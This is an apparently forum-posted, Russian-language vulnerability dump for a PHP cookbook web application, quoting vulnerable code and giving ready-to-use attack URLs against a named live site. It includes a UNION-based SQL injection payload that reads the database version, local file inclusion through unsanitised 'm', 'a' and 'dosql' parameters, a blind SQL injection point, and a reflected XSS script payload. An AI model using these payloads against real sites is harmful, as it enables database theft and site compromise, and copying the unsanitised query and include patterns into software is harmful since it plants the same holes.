Уязвимость : SQL

Файл modules\recipes\search.php

if ($_REQUEST["course_id"]) $query .= " recipe_course=" . $_REQUEST["course_id"] . " AND"; if ($_REQUEST["base_id"]) $query .= " recipe_base=" . $_REQUEST["base_id"] . " AND"; if ($_REQUEST["ethnic_id"]) $query .= " recipe_ethnic=" . $_REQUEST["ethnic_id"] . " AND"; if ($_REQUEST["time_id"]) $query .= " recipe_prep_time=" . $_REQUEST["time_id"] . " AND"; if ($_REQUEST["difficult_id"]) $query .= " recipe_difficulty=" . $_REQUEST["difficult_id"] . " AND";

Запрос там выше, искать времени нету

__http://www.bergiescookbook.com/cookbook/index.php?m=recipes&a=search&search=yes&base_id=-10+union+select+1,version(),3,4,5,6,7--

Уязвимость : LFI
Условия :MQ=off

Файл index.php

$m = isset( $_GET['m'] ) ? $_GET['m'] : 'recipes';
$a = isset( $_GET['a'] ) ? $_GET['a'] : 'index';
include "modules/$m/$a.php";


__http://www.bergiescookbook.com/cookbook/index.php?m=recipes'&a=search'&search=yes&base_id=10


Ушел спать, время многО, завтра добью

Уязвимоть : Blind -SQL

Файл : modules\recipes\view.php

$recipe_id = isset( $_GET['recipe_id'] ) ? $_GET['recipe_id'] : 0;
$show_ratings = isset ($_GET['show_ratings'] ) ? true : false;
$show_ratings = isset($_GET['show_ratings']) ? isset($_GET['show_ratings']) : $g_rb_show_ratings;

#Construct the Query and do most of the setup first, the print html
$sql = "SELECT $db_table_recipes.*,
ethnic_desc,
base_desc,
course_desc,
time_desc,
difficult_desc,
user_name
FROM $db_table_recipes
LEFT JOIN $db_table_ethnicity ON ethnic_id = recipe_ethnic
LEFT JOIN $db_table_bases ON base_id = recipe_base
LEFT JOIN $db_table_courses ON course_id = recipe_course
LEFT JOIN $db_table_prep_time ON time_id = recipe_prep_time
LEFT JOIN $db_table_difficulty ON difficult_id = recipe_difficulty
LEFT JOIN $db_table_users ON user_login = recipe_owner
WHERE recipe_id = $recipe_id";


Уязвимость : LFI

if (!empty( $_REQUEST['dosql'] )) {
include "modules/$m/".$_REQUEST['dosql'].".php";


__http://www.bergiescookbook.com/cookbook/index.php?dosql='

Уязвимость pXSS

<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=mass"><?php echo $LangUI->_('Mass');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=volume"><?php echo $LangUI->_('Volume');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=volume2mass"><?php echo $LangUI->_('Volume to mass');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=mass2volume"><?php echo $LangUI->_('Mass to volume');?></a> |
<a href="<?php echo $PHP_SELF ?>?m=utils&a=converter&type=temperature"><?php echo $LangUI->_('Temperature');?></a>


Лично из за этого кода я и попер смареть xss я прав??

_http://www.bergiescookbook.com/cookbook/index.php?m=utils&a=converter&type=volume/%3E%3Cscript%3Ealert(/%C1%F3%EA%E8%ED%E0%F2%EE%F0/)%3C/script%3E

слив РОА